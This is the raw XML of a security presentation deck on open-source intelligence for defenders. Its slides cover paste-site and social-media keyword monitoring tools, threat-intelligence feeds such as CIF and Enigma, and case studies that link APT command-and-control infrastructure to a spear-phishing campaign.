              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Pastelert</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="282575" marR="0" lvl="0" indent="-282575" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="□"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Tracks keyword searches against pastbin.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="282575" marR="0" lvl="0" indent="-282575" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="□"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="282575" marR="0" lvl="0" indent="-282575" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="□"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Generates web-based alerts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="282575" marR="0" lvl="0" indent="-282575" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="□"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Integrates with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Maltego</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>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 name="Picture 6" descr="pastycake_example"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="631671" y="4260054"/>
            <a:ext cx="3776989" cy="1821022"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 8"/>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488528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OSINT Tool – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hyperwired</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> OPSEC tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The OSINT OPSEC Tool monitors multiple 21st Century OSINT sources real-time for keywords, then analyses the results, generates alerts, and maps trends of the data, finding all sorts of info people probably don't want others to see... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Current monitored sites </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Source | Native/Custom API | Authentication? | API Limits):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Twitter | native API | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> through OAuth | 150 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/hour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reddit | native API | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> through a unique User-Agent | 1800 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/hour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> | native API | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>noauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> | ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Facebook | native API | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>noauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> yet; may be needed for user | 70,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/hour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pastebin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> | custom | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>noauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> | ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>StackExchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> | native API | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> through API key | 400 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/hour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Additionally the Google Maps API is used:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>GeoCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> API | native API | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>noauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> | 104 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/hour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Maps API | native API | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> | ?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each API is generally not queried more than once a minute to prevent throttling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The OSINT OPSEC Tool backend is written in Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data is stored in a MySQL Backend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP is used for the frontend</a:t>
            </a:r>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37</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8161554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OSINT Threat Feeds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Provide sources for additional information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Can be fed into multiple parts of a security infrastructure </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>CIF – Collective Intelligence Framework </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://code.google.com/p/collective-intelligence-framework/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Threat Stream (formerly ArcOSI) Now Paid </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://threatstream.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Enigma Threat Indicators </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://enigmaindicators.codeplex.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>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38</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264181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Threat Feeds – CIF </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CIF is a cyber threat intelligence management system. CIF allows you to combine known malicious threat information from many sources and use that information for identification (incident response), detection (IDS) and mitigation (null route). The most common types of threat intelligence warehoused in CIF are IP addresses, domains and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> that are observed to be related to malicious activity.  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://code.google.com/p/collective-intelligence-framework/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400"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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="CIF_IPquery.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="165658" y="4323488"/>
            <a:ext cx="8793702" cy="1026758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>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702912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OSINT? 	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Open-Source Intelligence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (OSINT) refers to a broad array of information and sources that are generally available, including information obtained from the media (newspapers, radio, television, etc.), professional and academic records (papers, conferences, professional associations, etc.), and public data (government reports, demographics, hearings, speeches, etc.).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unlike the other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>INTs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, open-source intelligence is not the responsibility of any one agency, but instead is collected by the entire USIC. One advantage of OSINT is its accessibility, although the sheer amount of available information can make it difficult to know what is of value. Determining the data's source and its reliability can also be complicated. OSINT data therefore still requires review and analysis to be of use to policymakers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" smtClean="0"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.fbi.gov/about-us/intelligence/disciplines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6CB578AE-4A26-CC4C-B2F8-EB2C2A85F4AA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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2793686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Threat Feed – Enigma Indicators</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Enigma is a bash script that parses known suspicious email address senders, email subjects, email sender and attached files, suspicious files, IP addresses, domains, web requested URLs, URL file names, top requested news feeds, suspicious user agent strings, and suspicious MD5 file hashes from open and custom close source intelligence feeds. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Created by an Arcsight consultant </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Maintained for free outside of company </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>40</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8635591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Enigma Babbin Port rewrite partial output </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="enigma_babbin.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-47610" r="-47610"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1338211"/>
            <a:ext cx="8229600" cy="4668940"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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37160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971800"/>
            <a:ext cx="8229600" cy="944562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Putting It All Together</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6CB578AE-4A26-CC4C-B2F8-EB2C2A85F4AA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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401662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Advanced Persistent Threat (APT) – Shared Resources</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Goal: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Determine if targeted malware communications (C2 traffic) from one victim site has any associations to other attacks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tools: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Source IP address and DNS name of malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Discovered: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware shared network infrastructure for multiple attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Found a newly created Domain that indicated another victim. Contacted their security team and discovered they were just starting an investigation into a spear phishing campaign that was launched earlier in the day! </a:t>
            </a:r>
          </a:p>
          <a:p>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43</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0369800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APT – Shared Resources Spear Phish Campaign</a:t>
            </a:r>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Example_2_NASA_EOP.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="205287" y="952456"/>
            <a:ext cx="8329113" cy="5143544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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571729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Explain complex operations </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Background </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enterprise AV alert for dropper file found on workstation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SOC asked to investigate. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tools: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>trouble tickets/user reports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enterprise AV and SOC resources </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Result  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mapped multiple separate events to a single campaign </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
